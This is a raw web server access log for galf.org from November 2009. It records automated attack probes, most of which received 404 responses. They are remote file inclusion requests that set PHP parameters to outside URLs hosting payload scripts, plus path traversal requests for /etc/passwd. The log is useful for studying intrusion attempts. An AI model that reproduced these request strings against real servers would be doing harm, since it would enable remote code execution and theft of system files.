66.98.252.9 - - [09/Nov/2009:00:48:34 -0800] "GET /logs/access_090817.log%20%20/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:48:46 -0800] "GET /logs//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:48:46 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:48:56 -0800] "GET /logs/access_090316.log/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:00 -0800] "GET /logs/access.log//index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:00 -0800] "GET /index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:00 -0800] "GET /logs//index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:12 -0800] "GET /logs/access_090323.log//index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:12 -0800] "GET /index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:12 -0800] "GET /logs//index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:49:14 -0800] "GET /logs/access_090316.log/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:49:19 -0800] "GET /logs/access_090316.log%20%20/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:00:49:20 -0800] "GET /logs/access.log//index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:49:36 -0800] "GET /logs/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:49:38 -0800] "GET /logs/access_090817.log/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.252.9 - - [09/Nov/2009:00:49:38 -0800] "GET /errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:00:50:00 -0800] "GET /logs/access_090720.log//index.php?framefile=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
202.123.212.188 - - [09/Nov/2009:00:50:03 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.123.212.188 - - [09/Nov/2009:00:50:03 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.123.212.188 - - [09/Nov/2009:00:50:03 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.acumuladoresroverano.com/errors/401/id1.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.98.252.9 - - [09/Nov/2009:00:50:26 -0800] "GET /logs/access_090316.log%20%20/errors.php?error=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:00:50:33 -0800] "GET /logs/access_090810.log///appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:00:50:33 -0800] "GET //appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:00:50:33 -0800] "GET /logs///appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:51:04 -0800] "GET /logs/access.log//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:51:04 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:51:04 -0800] "GET /logs//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:51:49 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:52:12 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:52:19 -0800] "GET /logs/access_090323.log//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:52:19 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:52:23 -0800] "GET /logs//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:54:52 -0800] "GET /ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:54:52 -0800] "GET /logs//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:00:54:52 -0800] "GET /logs/access_091012.log//ashnews.php?pathtoashnews=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:55:11 -0800] "GET /logs/access.log//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:55:11 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:55:11 -0800] "GET /logs//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
208.79.234.43 - - [09/Nov/2009:00:55:41 -0800] "GET /logs/access_090323.log//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:55:41 -0800] "GET /index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
208.79.234.43 - - [09/Nov/2009:00:55:44 -0800] "GET /logs//index.php?framefile=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:06 -0800] "GET /logs/access.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:06 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:07 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:07 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:07 -0800] "GET /logs/access.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:07 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:12 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:12 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [09/Nov/2009:00:56:12 -0800] "GET /logs/access.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.64.94.64 - - [09/Nov/2009:00:56:59 -0800] "GET ////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:56:59 -0800] "GET /logs/////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:56:59 -0800] "GET /logs/access_091012.log/////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:57:38 -0800] "GET ////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:57:38 -0800] "GET /logs/////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:57:38 -0800] "GET /logs/access_091012.log%20%20/////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:58:15 -0800] "GET /logs/access_091012.log/////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:58:15 -0800] "GET ////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.64.94.64 - - [09/Nov/2009:00:58:15 -0800] "GET /logs/////s_loadenv.inc.php?DOCUMENT_ROOT=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:00:58:48 -0800] "GET /phphtml.php?htmlclass_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:00:58:48 -0800] "GET /logs/access_090622.log%20%20/phphtml.php?htmlclass_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:00:58:48 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:00:58:53 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:00:58:53 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:00:58:53 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.98 - - [09/Nov/2009:00:59:27 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.139.66.104 - - [09/Nov/2009:01:00:40 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
87.139.66.104 - - [09/Nov/2009:01:00:40 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:01:00:54 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:01:00:54 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:01:00:54 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.84.148.109 - - [09/Nov/2009:01:01:38 -0800] "GET /?header=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
88.84.148.109 - - [09/Nov/2009:01:01:38 -0800] "GET /?header=./../../../../../../../../etc/passwd HTTP/1.0" 200 1032 "-" "-" "www.galf.org"
85.25.94.14 - - [09/Nov/2009:01:02:34 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
204.14.90.22 - - [09/Nov/2009:01:03:19 -0800] "GET /nucleus/xmlrpc/server.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:01:05:05 -0800] "GET /logs/access_091012.log%20%20/////s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:01:05:05 -0800] "GET /logs/////s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:01:05:05 -0800] "GET ////s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:01:07:03 -0800] "GET /paginedinamiche/main.php?pagina=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:01:07:03 -0800] "GET /logs//paginedinamiche/main.php?pagina=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:01:07:03 -0800] "GET /logs/access_090406.log//paginedinamiche/main.php?pagina=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.90.16.57 - - [09/Nov/2009:01:07:22 -0800] "GET /logs/access_090706.log//paginedinamiche/main.php?pagina=http://202.111.158.169/id2.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:43 -0800] "GET //appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:43 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:44 -0800] "GET /logs/access_090427.log///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:46 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:51 -0800] "GET //appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:51 -0800] "GET /logs/access_090427.log///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:10:51 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:11:17 -0800] "GET //appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:11:17 -0800] "GET /logs///appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:11:17 -0800] "GET /logs/access_090518.log%20%20///appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:11:31 -0800] "GET //appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:11:31 -0800] "GET /logs///appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:11:31 -0800] "GET /logs/access_090518.log%20%20///appserv/main.php?appserv_root=%20http://buntutkud4.fileave.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:35 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:35 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:35 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:37 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:37 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:37 -0800] "GET /logs/access.log%20%20//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:38 -0800] "GET /logs/access_090810.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:38 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:38 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:39 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:39 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:39 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:42 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:42 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:42 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:49 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:49 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:12:49 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:13:01 -0800] "GET /admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:13:01 -0800] "GET /logs//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:13:01 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:13:01 -0800] "GET /logs/access_090720.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:13:11 -0800] "GET /logs/access_090720.log//admin/auth.php?xcart_dir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:14:14 -0800] "GET /logs/access_090518.log///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:14:36 -0800] "GET /logs/access_090518.log///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:01:14:43 -0800] "GET /logs/access_090518.log///appserv/main.php?appserv_root=http://www.csps.ptc.edu.tw/id.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.27.203.107 - - [09/Nov/2009:01:17:08 -0800] "GET /logs/access_091012.log/////s_loadenv.inc.php?DOCUMENT_ROOT=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:01:17:10 -0800] "GET /logs/access_091012.log///vwar/backup/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:01:17:11 -0800] "GET //vwar/backup/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:01:17:11 -0800] "GET /logs///vwar/backup/errors.php?error=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.14.90.22 - - [09/Nov/2009:01:17:24 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:19:05 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:19:05 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [09/Nov/2009:01:19:05 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
